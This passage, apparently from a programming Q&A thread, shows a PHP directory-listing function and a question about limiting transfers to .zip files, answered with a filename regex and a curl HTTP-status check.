if ($fp = #opendir($source_dir))
{
$filedata = '';
$new_depth = $directory_depth - 1;
$source_dir = rtrim($source_dir, DIRECTORY_SEPARATOR).DIRECTORY_SEPARATOR;
while (FALSE !== ($file = readdir($fp)))
{
// Remove '.', '..', and hidden files [optional]
if ( ! trim($file, '.') OR ($hidden == FALSE && $file[0] == '.'))
{
continue;
}
if (($directory_depth < 1 OR $new_depth > 0) && #is_dir($source_dir.$file))
{
$filedata .= 'directory:'.$file.directory_map($source_dir.$file.DIRECTORY_SEPARATOR, $new_depth, $hidden);
}
else
{
$filedata .= $file;
}
}
closedir($fp);
return $filedata;
}
return FALSE;
}
But the problem is how I can restrict that only .zip files will be downloaded and uploaded to my local drive.

Since the filename is just a string you could use/modify the answer from this SO question:
$rex = "/^.*\.(zip)$/i";
preg_match($rex, $file)
Edit:
For error codes try:
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404){ //do some error handling }

Categories